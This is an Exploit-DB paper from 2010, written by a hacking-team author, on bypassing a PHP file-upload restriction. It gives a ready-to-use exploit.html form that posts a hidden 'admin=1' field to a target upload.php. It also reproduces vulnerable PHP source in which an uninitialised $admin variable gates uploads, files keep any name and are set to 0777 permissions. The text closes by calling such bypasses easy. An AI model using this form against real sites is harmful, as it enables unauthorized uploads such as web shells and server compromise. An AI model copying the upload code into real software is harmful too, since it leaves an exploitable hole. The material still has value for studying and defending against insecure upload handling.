Bypassing UPLOAD Variable

EDB-ID:

13706

CVE:

N/A

Author:

GlaDiaT0R

Type:

papers

Platform:

Multiple

Published:

2010-05-20

                     ###############################################################################
                     # [+]Title: [Bypassing UPLOAD Variable]                                       #
                     ###############################################################################
                     # [+] About :                                                                 #
                     ###############################################################################
                     # Written by :  GlaDiaT0R                                                     #
                     # Contact: the_gl4di4t0r[AT]hotmail[DOT]com / berrahal.ryadh[AT]gmail[DOT]com #
                     # Team :  Tunisian Power Team  ( DarkGh0st.Net )                              #
                     ###############################################################################
                     # [+]    Summary:                                                             #
                     #           [1]-Introduction                                                  #
                     #           [2]-Detection                                                     #
                     #           [3]-Exploiting..                                                  #
                     #           [4]-Vulnerable Source code                                        #
                     ###############################################################################


[1]-Introduction

The bypass of a vulnerable PHP Upload works the same way that the bypass connection vulnerable.
Indeed we find in both cases a variable so the value given will be used to authenticate the request and passed to accept.
It is therefore possible to reconstruct a post that contains the variable value + authentication and ensure that the file
be accepted some restrictions so the preset.


=======================================================


[2]-Detection

To know this vulnerability you must therefore be in possession of source code used (vulnerable code used in a site template in distribution or other method to access the vulnerable source code used)
And it's essential to know the variable and its value used to authenticate the request.


=======================================================


[3]-Exploiting..

In our example the upload verify a number of specific information to the file upload (pixel size - maximum and minimum) and attribute value "1" to the variable $ admin authentication to be used to upload the image.
it will suffice to reforme post containing a field named admin whose value is "1" to bypass the restriction of the upload v vulnerable.
----------
vuln :
if(($infos_img[0] <= $width_max) && ($infos_img[1] <= $height_max) && ($_FILES['fupload']['size'] <= $max_size) && ($infos_img[0] > $height_min) && ($infos_img[1] > $width_min))
{
$admin = 1;
}
if  ($admin == 1 ){
// UPLOAD
---
exploit.html :

<html>

<head>
<title>/null</title>
<meta name="generator" content="Web Editor">
</head>
<p><form action="http://website.com/upload.php" name='upload' method='post' enctype='multipart/form-data'>
<input type="file" name="fupload"><input type="hidden" name="admin" value="1">


<input type="submit" value="Upload!">
</form>
 </form>
</body>

</html>
---


=======================================================


[4]-Vulnerable Source code

<?PHP
$max_size   = 1000000;
$width_max  = 2500;      
$height_max = 2500;    
$width_min  = 0;      
$height_min = 0;

$nom_file   = $_FILES['fupload']['name'];
$taille     = $_FILES['fupload']['size'];
$tmp        = $_FILES['fupload']['tmp_name'];
$infos_img = getimagesize($_FILES['fupload']['tmp_name']);

if(isset($_FILES['fupload']))
{
if(($infos_img[0] <= $width_max) && ($infos_img[1] <= $height_max) && ($_FILES['fupload']['size'] <= $max_size) && ($infos_img[0] > $height_min) && ($infos_img[1] > $width_min))
{
$admin = 1;
}
if  ($admin == 1 ){

    $slozka = "upload";
    $cil = $slozka . "/" .$_FILES['fupload']['name'];
    $nazev_souboru = $_FILES['fupload']['tmp_name'];
    $copy = move_uploaded_file($nazev_souboru, $cil);
    chmod ($cil, 0777);
    echo "fichier " .$_FILES['fupload']['name']. " uploadé sur le server.\n
<a href=\"$cil\"><h2>votre fichier</h2>[/url]";
}
else
echo "ERROR" . $_FILES['fupload']['error'];
}
?>
<p><form action="upload.php" name='upload' method='post' enctype='multipart/form-data'>
<input type="file" name="fupload">


<input type="submit" value="Upload!">
</form>

----------

i think it's easy now to bypass any ulpoad variable if the source code is vulnerable ;) 
any questions or suggestions ? contact me on  the_gl4di4t0r[AT]hotmail[DOT]com